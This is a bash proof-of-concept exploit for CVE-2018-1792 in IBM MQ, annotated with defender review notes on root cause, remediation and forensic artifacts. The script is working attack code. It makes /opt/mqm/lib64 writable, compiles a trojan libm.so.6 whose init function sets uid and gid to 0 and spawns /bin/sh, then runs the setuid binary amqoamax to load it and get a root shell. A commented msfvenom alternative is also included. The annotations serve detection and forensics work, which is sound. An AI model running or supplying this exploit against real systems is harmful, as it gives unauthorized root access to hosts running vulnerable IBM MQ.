CVE-2018-1792.sh
#!/bin/bash
# Author: Rich Mirch
# CVE: CVE-2018-1792
# Vendor Advisory: https://www-01.ibm.com/support/docview.wss?uid=ibm10734447
# Product: IBM MQ multiple versions for UNIX/Linux
# Description:
# The amqoamax and amqoampx setuid root binaries are vulnerable to shared
# object injection because the RUNPATH is set to /opt/mqm/lib64 which is
# owned by the mqm user. This PoC will create a trojan horse library that
# executes a root shell when loaded.
#
# Note: This PoC uses libm.so.6 however other libraries can be used
#
# Usage: Execute as the mqm user
#
# Review notes (defender's view of what this script does on a host):
#   - Root cause: a setuid-root binary resolves shared objects from a RUNPATH
#     directory that a non-root user (mqm) owns, so that user decides which
#     library the dynamic loader picks up. Remediation is the vendor fix in
#     the advisory above; the ownership/permission of /opt/mqm/lib64 is the
#     condition to verify on a deployed system.
#   - Artifacts this script produces, useful for detection and forensics:
#     a mode change on /opt/mqm/lib64 (555 -> 755), a libm.so.6 appearing
#     inside /opt/mqm/lib64, a temporary .c file plus woot.o in the working
#     directory, and a setuid binary under /opt/mqm/bin/security spawning
#     /bin/sh as root. The library and build objects are removed at the end,
#     but the directory mode change is never reverted and the file mktemp
#     itself created (the name without the .c suffix) is never deleted.
#
#set -x
# SRC holds the C source for the injected library. mktemp creates one file
# and ".c" is appended to that name, so the script writes a second,
# differently named file alongside it.
SRC=$(mktemp).c
# DST is the library name the setuid binary resolves through its RUNPATH.
DST=/opt/mqm/lib64/libm.so.6
# /opt/mqm/lib64 is 555 by default
# The chmod only succeeds because the directory is owned by the invoking
# (mqm) user; the new mode is not restored later in the script.
[[ -w /opt/mqm/lib64 ]] || chmod 755 /opt/mqm/lib64
# You can also use
# msfvenom -p linux/x64/exec \
# PrependSetgid=yes \
# PrependSetuid=yes \
# CMD=/bin/bash \
# -f elf-so > >/opt/mqm/lib64/libm.so.6
# The heredoc body is the exact C source written to $SRC: woot() sets the
# real/effective uid and gid to 0 and exec's /bin/sh. ${SRC?} aborts the
# script if SRC is unset.
cat >${SRC?}<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
setregid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
# Compile to a position-independent object in the current directory.
gcc -fPIC -o woot.o -Wall -c ${SRC?}
# Link a shared object whose soname matches the real library name and whose
# ELF init function is woot, so woot runs when the loader maps the library.
gcc -Wall -shared \
-Wl,-soname,$(basename ${DST?}) \
-Wl,-init,woot -o ${DST?} woot.o
echo "Executing amqoamax; note: amqoampx will also work"
# Executing the setuid-root binary makes the loader pick $DST up via RUNPATH.
/opt/mqm/bin/security/amqoamax
# Removes the library and build artifacts; this runs only after the shell
# spawned above exits. The directory mode and the bare mktemp file remain.
rm -f woot.o ${SRC?} ${DST?}